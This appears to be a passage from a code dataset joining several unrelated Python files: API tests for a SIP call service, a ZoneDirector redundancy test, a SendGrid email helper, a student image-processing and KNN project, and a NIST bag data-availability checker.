self.client.get('/api/v1/operators', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n operators = response.json['operators']\n self.assertEqual(len(operators), 0)\n\n\nclass TestGetOperatorList(TestBase):\n def _setTestData(self):\n for i in range(0, 10):\n Operator(phone_number=f'92{i}', name=f'operator_{i}').save()\n\n def test_get_operators(self):\n response = self.client.get('/api/v1/operators', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n operators = response.json['operators']\n self.assertEqual(len(operators), 10)\n for i in range(0, 10):\n self.assertEqual(operators[i]['phone_number'], f'92{i}')\n self.assertEqual(operators[i]['name'], f'operator_{i}')\n\n\nclass TestGetEmptyCallList(TestBase):\n def test_get_calls(self):\n response = self.client.get('/api/v1/calls', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 0)\n\n\nclass TestGetCallList(TestBase):\n def _setTestData(self):\n for i in range(0, 10):\n operator = Operator(phone_number=f'92{i}', name=f'operator_{i}').save()\n Call(\n id=secrets.token_hex(nbytes=16),\n type=c.CALL_TYPES['OUTGOING'],\n date=int(time.mktime(datetime.now().replace(hour=i).timetuple())),\n duration_answer=5,\n status=c.CALL_STATUSES['ACCEPTED'],\n phone_number_client='88005553535',\n phone_number_operator=operator.phone_number\n ).save()\n\n def test_get_calls(self):\n response = self.client.get('/api/v1/calls', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 10)\n\n for i in range(0, 10):\n self.assertEqual(calls[i]['phone_number_operator'], f'92{i}')\n\n def test_get_call_with_params(self):\n date_from = int(time.mktime(datetime.now().replace(hour=0, minute=0).timetuple()))\n date_till = int(time.mktime(datetime.now().replace(hour=5, minute=0).timetuple()))\n response = self.client.get(f'/api/v1/calls?date_from={date_from}&date_till={date_till}',\n headers=self.headers)\n\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 5)\n\n def test_get_empty_call_list(self):\n date_from = int(time.mktime(datetime.now().replace(hour=12).timetuple()))\n date_till = int(time.mktime(datetime.now().replace(hour=23, minute=59).timetuple()))\n\n response = self.client.get(f'/api/v1/calls?date_from={date_from}&date_till={date_till}',\n headers=self.headers)\n self.assertEqual(response.status_code, 200)\n\n calls = response.json['calls']\n self.assertEqual(len(calls), 0)\n\n\nclass TestRecording(TestBase):\n def _setTestData(self):\n for i in range(0, 1):\n operator = Operator(phone_number=f'92{i}', name=f'operator_{i}').save()\n Call(\n id=i,\n type=c.CALL_TYPES['OUTGOING'],\n date=int(time.mktime(datetime.now().replace(hour=i).timetuple())),\n duration_answer=5,\n status=c.CALL_STATUSES['ACCEPTED'],\n phone_number_client='88005553535',\n phone_number_operator=operator.phone_number\n ).save()\n\n def test_get_recording_success(self):\n response = self.client.get('/api/v1/recording?call_id=0', headers=self.headers)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content_type, 'audio/wav')\n self.assertIsNotNone(response.data)\n\n def test_get_recording(self):\n response = self.client.get('/api/v1/recording?call_id=test', headers=self.headers)\n self.assertEqual(response.status_code, 400)\n","repo_name":"awekening2/sip_api","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70814948906","text":"#!/usr/bin/env python\n\n# Convert the format of the EWK cross sections in the twiki to the limit code input format.\n\nimport os,sys\nfrom string import *\n\nfin = 'c1n2_xsecs_13TeV_raw.txt'\nfout = open('c1n2_xsecs_13TeV.txt', 'w')\n\nxsecs = open(fin).readlines()\n\nfor x in xsecs:\n x = split(strip(x))\n mass = x[0]\n xsec = atof(x[1]) / 1000.\n xsecerr = atof(x[2]) / atof(x[1]) * 100\n point = '%s %.4e %.2f \\n' % (mass, xsec, xsecerr) \n fout.write(point)\n","repo_name":"ssekmen/razorlimits","sub_path":"convertxsec_ewk.py","file_name":"convertxsec_ewk.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25585279458","text":"#import os\n#import re\nimport time\nimport logging\n\nfrom RuckusAutoTest.models import Test\n#from RuckusAutoTest.components.ZoneDirector import ZoneDirector\nfrom RuckusAutoTest.components.lib.zd import redundancy_zd\n#from RuckusAutoTest.components import Helper_ZD as zhlp\nimport RuckusAutoTest.common.lib_Debug as bugme \n\nclass CB_ZD_SR_Enable_Wrong_Peer_IP(Test):\n \n def config(self,conf):\n self._cfgInitTestParams(conf)\n \n def test(self):\n self.test_wrong_peer_ip()\n if self.errmsg:\n return self.returnResult('FAIL', self.errmsg)\n msg = 'Can NOT become a pair of Smart Redundancy ZD when using wrong peer IP address'\n return self.returnResult('PASS', msg)\n \n def cleanup(self):\n pass\n\n \n def _cfgInitTestParams(self, conf):\n self.errmsg = ''\n self.zd1 = self.carrierbag['zd1']\n self.zd2 = self.carrierbag['zd2']\n self.share_secret = self.carrierbag['share_secret'] \n self.ip_addr = conf['ip_addr']\n \n def test_wrong_peer_ip(self):\n pause = 5\n timeout = 30\n redundancy_zd.enable_single_smart_redundancy(self.zd1, self.ip_addr, self.share_secret) \n redundancy_zd.enable_single_smart_redundancy(self.zd2, self.ip_addr, self.share_secret)\n start_time = time.time()\n while True:\n if redundancy_zd.get_peer_device_state(self.zd1) == 'disconnected':\n if redundancy_zd.get_peer_device_state(self.zd2) == 'disconnected':\n logging.info(\"Correct behavior, the peer IP disconnected, so it is not a pair smart redundancy ZD\")\n break\n elif redundancy_zd.get_peer_device_state(self.zd1).find('mismatched'):\n logging.info(\"Correct behavior, the peer IP mismatched, so it is not a pair smart redundancy ZD\")\n break\n elif redundancy_zd.get_local_device_state(self.zd1) == 'active':\n if redundancy_zd.get_local_device_state(self.zd2) =='standby': \n self.errmsg = 'Incorrect behavior -- Enable smart redundancy successfully, and the ZD1 %s is the active ZD' % self.zd1.ip_addr\n return self.errmsg\n \n elif redundancy_zd.get_local_device_state(self.zd1) =='standby': \n if redundancy_zd.get_local_device_state(self.zd2) =='active':\n self.errmsg = 'Incorrect behavior -- Enable smart redundancy successfully, and the ZD2 %s is the active ZD' % self.zd2.ip_addr\n return self.errmsg\n else:\n time.sleep(pause)\n \n if time.time() - start_time > timeout:\n logging.info(\"The 2 ZD don't be enable smart redundancy after %d seconds\", timeout)\n break\n \n \n \n","repo_name":"jichunwei/MyGitHub-1","sub_path":"saigon/rat/RuckusAutoTest/tests/zd/CB_ZD_SR_Enable_Wrong_Peer_IP.py","file_name":"CB_ZD_SR_Enable_Wrong_Peer_IP.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7054474711","text":"import datetime\nimport logging\nfrom dataclasses import asdict\nfrom typing import Any\n\nfrom clients.sendgrid import get_sendgrid_client\nfrom models.subscribed_users import SubscribedUser\nfrom sendgrid import From, Mail, Personalization, To\nfrom templates import EMAIL_JINJA_ENVIRONMENT, TemplateContext\nfrom utils.timedelta import format_timedelta\n\n_logger = logging.getLogger(__name__)\n\n\ndef send_email(\n to_user: SubscribedUser,\n subject: str,\n template_name: str,\n should_include_unsubscribe_button: bool = True,\n extra_jinja_context: dict[str, Any] | None = None,\n):\n _logger.info(f\"Sending a {template_name} email to {to_user.user_email}...\")\n now = datetime.datetime.utcnow()\n subscription_duration = now.replace(tzinfo=None) - to_user.date_created.replace(tzinfo=None)\n\n context = TemplateContext(\n generated_at=now.strftime(\"%d %b, %Y at %H:%M\"),\n should_include_unsubscribe_button=should_include_unsubscribe_button,\n should_include_user_metadata=True,\n user_email=to_user.user_email,\n subscription_duration=format_timedelta(subscription_duration),\n )\n full_context = asdict(context)\n if extra_jinja_context:\n full_context.update(extra_jinja_context)\n email_content = EMAIL_JINJA_ENVIRONMENT.get_template(template_name).render(full_context)\n\n from_sender = From(\"backend@axleos.com\", \"axleOS.com backend\")\n message = Mail(\n from_email=from_sender,\n subject=subject,\n html_content=email_content,\n )\n personalization = Personalization()\n personalization.add_to(To(to_user.user_email))\n message.add_personalization(personalization)\n\n sendgrid_client = get_sendgrid_client()\n sendgrid_response = sendgrid_client.send(message)\n _logger.info(f\"Response from SendGrid: {sendgrid_response.status_code} {sendgrid_response.body}\")\n","repo_name":"codyd51/axleos-blog-newsletter","sub_path":"newsletter/utils/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71249831786","text":"import numpy as np\r\nfrom PIL import Image\r\n\r\n\r\n# RGB Image #\r\nclass RGBImage:\r\n \"\"\"\r\n The class RGBImage contains a constructor and many class\r\n functions as a template for image objects in RGB color spaces\r\n \"\"\"\r\n\r\n def __init__(self, pixels):\r\n \"\"\"\r\n This constructor takes in two arguments: self and pixels.\r\n The function checks if there are any exceptions in the input\r\n and initializes pixels to a 3D list, num_row to the amount of \r\n rows in the list and num_cols to the number of columns in the \r\n list\r\n \"\"\"\r\n\r\n if type(pixels) != list or len(pixels) == 0:\r\n raise TypeError()\r\n\r\n for row in pixels:\r\n for col in row:\r\n if type(row) != list or len(row) == 0:\r\n raise TypeError()\r\n if len(row) != len(pixels[0]):\r\n raise TypeError()\r\n if type(col) != list or len(col) != 3:\r\n raise TypeError()\r\n\r\n for row in pixels:\r\n for col in row:\r\n for num in col:\r\n if num < 0 or num > 255 or type(num) != int:\r\n raise ValueError()\r\n\r\n self.pixels = pixels\r\n self.num_rows = len(pixels)\r\n self.num_cols = len(pixels[0])\r\n\r\n def size(self):\r\n \"\"\"\r\n This function is a getter method, taking in the argument: self.\r\n The function uses self to return a tuple containing the number \r\n of rows and number of columns.\r\n \"\"\"\r\n return (self.num_rows, self.num_cols)\r\n\r\n def get_pixels(self):\r\n \"\"\"\r\n This function takes in one argument: self and uses self to\r\n get the corresponding pixels list. The function then returns a \r\n deep copy of the list.\r\n \"\"\"\r\n return [[list(inlist) for inlist in lst] for lst in self.pixels]\r\n\r\n\r\n def copy(self):\r\n \"\"\"\r\n This function takes in one argument: self and returns a deep\r\n copy using the helper function get_pixels above.\r\n \"\"\"\r\n return RGBImage.get_pixels(self)\r\n\r\n def get_pixel(self, row, col):\r\n \"\"\"\r\n This function takes in three arguments: self, row and col. The \r\n function returns a tuple containing three color values representing\r\n a pixel at the position row, col. If the input is invalid, the \r\n function will raise an error.\r\n \"\"\"\r\n \r\n if type(row) != int or type(col) != int:\r\n raise TypeError()\r\n\r\n try:\r\n return tuple(self.pixels[row][col])\r\n except IndexError:\r\n raise ValueError()\r\n\r\n\r\n def set_pixel(self, row, col, new_color):\r\n \"\"\"\r\n This function takes in four arguments: self, row, col, and new\r\n color. The function updates the color of the pixel at the postion\r\n row, col. If there is an invalid input, the function will raise\r\n a TypeError() or ValueError(). This function returns None.\r\n \"\"\"\r\n\r\n if type(row) != int or type(col) != int:\r\n raise TypeError()\r\n if new_color[0] > 255 or new_color[1] > 255 or new_color[2] > 255:\r\n raise ValueError()\r\n if type(new_color) != tuple or len(new_color) != 3:\r\n raise TypeError()\r\n if all(map(lambda num: type(num) == int, new_color)) == False:\r\n raise TypeError()\r\n\r\n for i in range(len(new_color)):\r\n if new_color[i] >= 0:\r\n self.pixels[row][col][i] = new_color[i]\r\n\r\n\r\n# Image Processing Template Methods #\r\nclass ImageProcessingTemplate:\r\n \"\"\"\r\n The class RGBImage contains a constructor and many class\r\n functions as a template for altering pixel matrices and \r\n calculating incurred costs by customers. \r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n This constructor initializes the instance cost to zero by \r\n default. The variable cost tracks the total incurred cost \r\n of self. \r\n \"\"\"\r\n self.cost = 0\r\n\r\n def get_cost(self):\r\n \"\"\"\r\n This function is a getter method that returns the current\r\n total incurred cost of self. \r\n \"\"\"\r\n return self.cost\r\n\r\n def negate(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. The function\r\n inverts the image given by the argument by subtracting each pixel\r\n value by 255.\r\n \"\"\"\r\n return RGBImage([[[255 - value for value in lst2] for lst2 in lst1] \\\r\n for lst1 in image.pixels])\r\n\r\n\r\n def grayscale(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. The function\r\n converts the image given in the argument into grayscale by taking the\r\n average of the pixels matrix.\r\n \"\"\"\r\n return RGBImage([[[sum(lst2)//3 for value in lst2] for lst2 in lst1] \\\r\n for lst1 in image.pixels])\r\n\r\n\r\n def rotate_180(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. The function\r\n rotates the image given in the argument by 180 degrees. \r\n \"\"\"\r\n r1 = image.get_pixels()[::-1]\r\n return RGBImage([col[::-1] for col in r1])\r\n\r\n\r\n# Standard Image Processing Methods #\r\nclass StandardImageProcessing(ImageProcessingTemplate):\r\n \"\"\"\r\n The class creates a money version of the template class, the class\r\n utilizes variables such as cost and coupouns to keep track of cost\r\n or use coupouns. Everytime a method has been called or used it \r\n increments the cost variable.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n This constructor initializes a cost instance to 0 by default \r\n which will track the total cost incurred by the user.\r\n \"\"\"\r\n self.cost = 0\r\n self.coupons = 0\r\n self.rotations = 0\r\n\r\n def negate(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. Whenever \r\n this function is called, the function will add $5 dollars to the \r\n instance cost and return the inverted image using the class:\r\n ImageProcessingTemplate.\r\n \"\"\"\r\n self.cost += 5\r\n return ImageProcessingTemplate.negate(self, image)\r\n\r\n def grayscale(self, image):\r\n \"\"\"\r\n This function takes in two arguments: self and image. Whenever \r\n this function is called, the function will add 6 dollars to the \r\n instance cost and return the grayscaled image using the class:\r\n ImageProcessingTemplate.\r\n \"\"\"\r\n self.cost += 6\r\n return ImageProcessingTemplate.grayscale(self, image)\r\n\r\n\r\n def rotate_180(self, image):\r\n \"\"\"\r\n This function takes in an input of the image and rotates the image to \r\n user's liking and increments the cost by 10 everytime ran. This \r\n function uses inheritance.\r\n \"\"\"\r\n self.rotations += 1\r\n\r\n if self.rotations % 2 != 0:\r\n if self.coupons > 0:\r\n self.coupons -= 1\r\n return super().rotate_180(image)\r\n else:\r\n self.cost += 10\r\n return super().rotate_180(image)\r\n elif self.rotations % 2 == 0:\r\n if self.coupons > 0:\r\n self.coupons -= 1\r\n else:\r\n self.cost -= 10\r\n\r\n\r\n def redeem_coupon(self, amount):\r\n \"\"\"\r\n The function takes in one input and reduces the cost\r\n by the amount of times the method is called (tracks how many\r\n times the method is called).\r\n \"\"\"\r\n if amount <= 0:\r\n raise ValueError()\r\n if type(amount) != int:\r\n raise TypeError()\r\n\r\n self.coupons += amount\r\n\r\n\r\n# Part 4: Premium Image Processing Methods #\r\nclass PremiumImageProcessing(ImageProcessingTemplate):\r\n \"\"\"\r\n This class has two methods of chroma_ley and sticker\r\n and is the premium version of the app, where it automatically\r\n increses the cost of the app to be $50 dollars.\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Constructor of the class that intializes the variable\r\n cost to be $50.\r\n \"\"\"\r\n self.cost = 50\r\n\r\n def chroma_key(self, chroma_image, background_image, color):\r\n \"\"\"\r\n This function takes in 3 inputs and changes the chroma background\r\n of the image. It checks if the types and instances of the inputs\r\n are valid or not by raising errors, if they are invalid. \r\n \"\"\"\r\n\r\n if not isinstance(chroma_image, RGBImage) or not \\\r\n isinstance(background_image, RGBImage):\r\n raise TypeError()\r\n\r\n if len(chroma_image.pixels) != len(background_image.pixels):\r\n raise ValueError()\r\n\r\n chroma = list(chroma_image.pixels)\r\n\r\n for lst in chroma_image.pixels:\r\n row = chroma_image.pixels.index(lst)\r\n for pix in lst:\r\n if pix == list(color):\r\n col = lst.index(pix)\r\n chroma[row][col] = background_image.pixels[row][col]\r\n\r\n return RGBImage(chroma)\r\n\r\n\r\n def sticker(self, sticker_image, background_image, x_pos, y_pos):\r\n \"\"\"\r\n The function takes in 4 inputs and checks if each input is valid, by\r\n raising errors if the input is invalid, it then places a sticker onto\r\n the image by creating a new image.\r\n \"\"\"\r\n sticker_rows = len(sticker_image.pixels)\r\n sticker_cols = len(sticker_image.pixels[0])\r\n background_rows = len(background_image.pixels)\r\n background_cols = len(background_image.pixels[0])\r\n\r\n if not isinstance(sticker_image, RGBImage) or not \\\r\n isinstance(background_image, RGBImage):\r\n raise TypeError()\r\n\r\n if type(x_pos) != int or type(y_pos) != int:\r\n raise ValueError()\r\n\r\n if sticker_rows >= background_rows or sticker_cols >= \\\r\n background_cols:\r\n raise ValueError()\r\n\r\n if background_rows < y_pos + sticker_rows or background_cols < \\\r\n x_pos + sticker_cols:\r\n raise ValueError()\r\n\r\n background = list(background_image.pixels)\r\n\r\n for row in range(y_pos, y_pos + sticker_rows):\r\n for col in range(x_pos, x_pos + sticker_cols):\r\n background[row][col] = sticker_image.pixels \\\r\n [row-y_pos][col-x_pos]\r\n\r\n return RGBImage(background)\r\n\r\n\r\n# Part 5: Image KNN Classifier #\r\nclass ImageKNNClassifier:\r\n \"\"\"\r\n The class implements machine learning type features\r\n by checking image data to see how freqeuent and revelant it is\r\n \"\"\"\r\n\r\n def __init__(self, n_neighbors):\r\n \"\"\"\r\n The function intializes variable n_neigbhors\r\n \"\"\"\r\n self.n_neighbors = n_neighbors\r\n\r\n def fit(self, data):\r\n \"\"\"\r\n The function takes in an input of data and sets \r\n the value of data into self.data\r\n \"\"\"\r\n if len(data) <= self.n_neighbors:\r\n raise ValueError()\r\n if self.data:\r\n raise ValueError()\r\n\r\n self.data = data\r\n\r\n @staticmethod\r\n def distance(image1, image2):\r\n \"\"\"\r\n The function takes in two inputs and caculates\r\n the Euclidean distance of both inputs, and checks\r\n if the both inputs are RBGImage by raising errors if they are\r\n not\r\n \"\"\" \r\n if not isinstance(image1, RGBImage) or not isinstance(image2, \\\r\n RGBImage):\r\n raise TypeError()\r\n\r\n if len(image1.pixels) != len(image2.pixels):\r\n raise ValueError()\r\n\r\n p1 = image1.get_pixels()\r\n p2 = image2.get_pixels()\r\n\r\n return sum([(p1[row][col][chan] - p2[row][col][chan])**2 \\\r\n for row in range(len(p1)) \\\r\n for col in range(len(p1[row])) \\\r\n for chan in range(len(p1[row][col]))]) ** (1/2)\r\n\r\n\r\n @staticmethod\r\n def vote(candidates):\r\n \"\"\"\r\n The function finds the most viewed or popular label and \r\n returns it. In case of a tie, any one of them is returned.\r\n \"\"\"\r\n counter = 0\r\n popular = candidates[0]\r\n\r\n for candidate in candidates:\r\n frequency = candidates.count(candidate)\r\n if frequency > counter:\r\n counter = frequency\r\n popular = candidate\r\n\r\n return popular\r\n\r\n def predict(self, image):\r\n \"\"\"\r\n The function gives a guess using the vote method \r\n for the neighbors\r\n \"\"\"\r\n if not self.data:\r\n raise ValueError\r\n\r\n distance = [(ImageKNNClassifier.distance \\\r\n (image, tup[0]), tup[1]) for tup in self.data]\r\n\r\n sort = sorted(distance, key=lambda x: x[0], \\\r\n reverse=False)[:self.n_neighbors]\r\n\r\n cand_list = [tup[1] for tup in sort]\r\n\r\n return ImageKNNClassifier.vote(candidate_list)\r\n\r\n\r\ndef img_read_helper(path):\r\n img = Image.open(path).convert(\"RGB\")\r\n matrix = np.array(img).tolist()\r\n return RGBImage(matrix)\r\n\r\n\r\ndef img_save_helper(path, image):\r\n img_array = np.array(image.get_pixels())\r\n img = Image.fromarray(img_array.astype(np.uint8))\r\n img.save(path)\r\n\r\n\r\ndef create_random_pixels(low, high, nrows, ncols):\r\n return np.random.randint(low, high + 1, (nrows, ncols, 3)).tolist()","repo_name":"jeh027/Image-Processing-Project","sub_path":"Image Processing Project.py","file_name":"Image Processing Project.py","file_ext":"py","file_size_in_byte":13388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72988780907","text":"\"\"\"\ntools for checking the availability of distributions described in a NIST bag.\n\"\"\"\nimport os, re\nfrom collections import Mapping\n\nimport multibag as mb\nimport requests\n\nfrom .utils import parse_bag_name\nfrom ...exceptions import ConfigurationException, StateException\nfrom ...distrib import (RESTServiceClient, BagDistribClient, DistribServerError,\n DistribServiceException, DistribResourceNotFound)\n\nclass DataChecker(object):\n \"\"\"\n a class that will run checks to ensure all data distributions are accounted\n for and available.\n\n A distribution that is listed as a downloadable component in the NERDm \n metadata must be available from one of the following sources:\n 1) under the bag's data payload directory (at the location given by \n the component's filepath property)\n 2) from the URL given by the downloadURL property (tested via a HEAD request)\n 3) in a multibag member bag as indicated in the multibag/file-lookup.tsv \n file found in either,\n a) a cached copy of the specified member bag\n b) in a remote copy of the specified member bag available via the \n distribution service.\n \"\"\"\n\n AVAIL_NOT = \"not available\"\n AVAIL_IN_BAG = \"available in current bag\"\n AVAIL_IN_CACHED_BAG = \"available in cached bag\"\n AVAIL_VIA_URL = \"available via download URL\"\n AVAIL_IN_REMOTE_BAG = \"available in remote bag via service\"\n\n def __init__(self, bag, config=None, log=None):\n \"\"\"\n initialize the checker around the bag to be checked\n \"\"\"\n self.bag = bag\n if not config:\n config = {}\n self.cfg = config\n self.log = log\n \n self._store = config.get('store_dir')\n self._mbag = mb.open_headbag(bag.dir)\n self._disturlpat = self.cfg.get('pdr_dist_url_pattern',\n r'^https?://[^/]+/od/ds/(.+)')\n try:\n self._disturlpat = re.compile(self._disturlpat)\n if self._disturlpat.groups < 1:\n raise ConfigurationException(\"pdr_dist_url_pattern: regex is \" +\n \"missing group to capture filepath: \"+\n self._disturlpat.pattern)\n except re.error as ex:\n raise ConfigurationException(\"pdr_dist_url_pattern: regex does \" +\n \"not compile: \" + self._disturlpat)\n\n self._distsvc = None\n svcurl = self.cfg.get('repo_access',{}).get('distrib_service',{}) \\\n .get('service_endpoint')\n if svcurl:\n self._distsvc = RESTServiceClient(svcurl)\n\n def available_in_bag(self, cmp):\n \"\"\"\n return True if the specified data is found in the bag. \n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in the bag or the filepath \n property is not included in the input metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return False\n cmp = cmp['filepath']\n\n path = os.path.join(self.bag.data_dir, cmp)\n return os.path.isfile(path)\n\n def bag_location(self, cmp):\n \"\"\"\n return the name of the member bag that contains specified the data file\n or None if a member bag is not specified.\n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). None is \n returned if either the filepath is not found in the bag or the filepath \n property is not included in the input metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return None\n cmp = cmp['filepath']\n\n path = '/'.join(['data', cmp])\n return self._mbag.lookup_file(path)\n\n def located_here(self, cmp):\n \"\"\"\n return True if the the downloadable file should be located in the \n current bag.\n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in the bag or the filepath \n property is not included in the input metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n loc = self.bag_location(cmp)\n return loc == self.bag.name\n\n def available_in_cached_bag(self, cmp, inbag=None):\n \"\"\"\n return true if the specified data file can be found in a cached\n member bag.\n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in a cached bag, if \n the location of the bag cache directory is not known, or if the \n filepath property is not included in the given component metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n :param str inbag: the name of the bag that should contain the file. \n If None, this path will be looked up in the current bag's \n file lookup list.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return False\n cmp = cmp['filepath']\n\n if not inbag:\n inbag = self.bag_location(cmp)\n if not inbag:\n return False\n\n locs = [ os.path.join(self._store, inbag) ]\n if not os.path.isdir(locs[0]):\n locs = [os.path.join(self._store, f) for f in os.listdir(self._store)\n if f.startswith(inbag+\".\")]\n if len(locs) == 0:\n return False\n\n for loc in locs:\n if not os.path.isfile(loc):\n continue\n try:\n mbag = mb.open_bag(loc)\n except Exception as ex:\n continue\n if mbag.isfile('/'.join(['data', cmp])):\n return True\n\n return False\n\n def has_pdr_url(self, cmp):\n \"\"\"\n return True if the specified data file is downloadable via the PDR's\n distribution service. \n\n The data file can either be specified via its component metadata (as a \n dict) or directly by its downloadURL property (as a string). False \n is returned if the property is not included in the component metadata\n or if the URL does not match the base associated with the distribution\n service.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's download URL.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'downloadURL' not in cmp:\n return False\n cmp = cmp['downloadURL']\n\n return bool(self._disturlpat.match(cmp))\n\n @classmethod\n def head_url(cls, url):\n \"\"\"\n make a HEAD request on the given URL and return the status code\n and associated message as a tuple. \n\n This raises a requests.RequestsException if a connection cannot be \n made.\n \"\"\"\n resp = None\n try:\n resp = requests.head(url, allow_redirects=True)\n return (resp.status_code, resp.reason)\n finally:\n if resp is not None:\n resp.close()\n \n\n def available_via_url(self, cmp):\n \"\"\"\n return True if the specified data file appears available via its \n download URL. A HEAD request is conducted on the download URL; True \n is returned if the request returns a 2XX status.\n\n The data file can either be specified via its component metadata (as a \n dict) or directly by its downloadURL property (as a string). False \n is returned if the property is not included in the component metadata\n or if the URL does not match the base associated with the distribution\n service.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's download URL.\n \"\"\"\n dlurl = cmp\n if isinstance(cmp, Mapping):\n if 'downloadURL' not in cmp:\n return False\n dlurl = cmp['downloadURL']\n cmp = cmp.get('filepath', dlurl)\n\n try:\n (stat, msg) = self.head_url(dlurl)\n ok = stat >= 200 and stat < 300\n if not ok and self.log:\n self.log.debug(\"HEAD on %s: %s (%i)\", cmp, msg, stat)\n return ok\n except requests.RequestException as ex:\n if self.log:\n self.log.warning(\"Trouble accessing download URL: \" + str(ex) +\n \"\\n ({0})\".format(cmp))\n return False\n\n def available_as(self, cmp, strict=False, viadistrib=True):\n \"\"\"\n return an enumeration value indicating how the specified data file is \n found to be available. \n\n :param dict cmp: a dict containing the component metadata describing \n the data file\n :param bool strict: if True, don't assume if remote bag containing the\n file is available that the file is actually in the\n bag. Currently, this implementation will return\n False if the file is not available from any other\n source. \n :param bool viadistrib: if True, only check to see if the file is \n available via its downloadURL if the URL points\n to the PDR's distribution service. \n \"\"\"\n if self.available_in_bag(cmp):\n return self.AVAIL_IN_BAG\n if self.available_in_cached_bag(cmp):\n return self.AVAIL_IN_CACHED_BAG\n if (not viadistrib or self.has_pdr_url(cmp.get('downloadURL',''))) and \\\n self.available_via_url(cmp):\n return self.AVAIL_VIA_URL\n if not strict and self._distsvc and self.containing_bag_available(cmp):\n return self.AVAIL_IN_REMOTE_BAG\n return self.AVAIL_NOT\n\n def available(self, cmp, strict=False, viadistrib=True):\n \"\"\"\n return True if the specified data file is currently available somewhere.\n This function (using available_as()) will cycle through possible \n locations of the file, searching until it finds it. This includes:\n 1. the current bag\n 2. in a bag located in a local cache\n 3. at its download URL\n 4. in a remote bag available via the distribution service*\n\n When the file is found, True is returned; otherwise, False is returned.\n\n *in this implementation with location (4), the remote bag's contents \n are not examined; only the availability of that bag is checked. \n \"\"\"\n return self.available_as(cmp, strict, viadistrib) is not self.AVAIL_NOT\n \n def containing_bag_available(self, cmp):\n \"\"\"\n return True if the member bag that contains the specified component\n is available via the distribution service. An exception is raised \n if this checker was not configured with the distribution service \n endpoint configured or if the service is not available. \n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in a cached bag, if \n the location of the bag cache directory is not known, or if the \n filepath property is not included in the given component metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return False\n cmp = cmp['filepath']\n\n mbagname = self.bag_location(cmp)\n if not mbagname:\n return False\n try:\n parts = parse_bag_name(mbagname)\n except ValueError as ex:\n if self.log:\n self.log.warning(\"data file listed as in bag with illegal name: \"+\n mbagname)\n return False\n parts[1] = parts[1] or \"0\"\n parts[1] = re.sub(r'_','.',parts[1])\n \n if not self._distsvc:\n raise StateException(\"Distribution service not configured\")\n bagsvc = BagDistribClient(parts[0], self._distsvc)\n\n try:\n matches = [f for f in bagsvc.list_for_version(parts[1])\n if f.startswith(mbagname+\".\")]\n return len(matches) > 0\n\n except DistribResourceNotFound as ex:\n if self.log:\n self.log.debug(\"No bags for %s found via bag service\", parts[0])\n return False\n\n except DistribServerError as ex:\n if self.log:\n self.log.error(\"query on %s: service connect error: %s\",\n mbagname, str(ex))\n return False\n\n except DistribServiceError as ex:\n if self.log:\n self.log.error(\"unexpected error while querying on %s: %s\",\n mbagname, str(ex))\n \n\n def unavailable_files(self, strict=False, viadistrib=True):\n \"\"\"\n return a list of the data file component filepaths that appear to \n be unavailable via any means. This is a check to make sure that all\n of the distributions listed in the NERDm record are either in the \n present bag or otherwise previously preserved and available; in this\n case, the returned list will be empty.\n\n :param bool strict: if True, don't assume if remote bag containing the\n file is available that the file is actually in the\n bag. Currently, this implementation will return\n False if the file is not available from any other\n source. \n :param bool viadistrib: if True, check a file's availability only if\n its download URL points to the PDR's \n distribution service. \n \"\"\"\n missing = []\n nerd = self.bag.nerdm_record(False)\n for cmp in nerd.get('components',[]):\n if \"dcat:Distribution\" not in cmp.get('@type',[]) or \\\n 'downloadURL' not in cmp:\n continue\n if viadistrib and 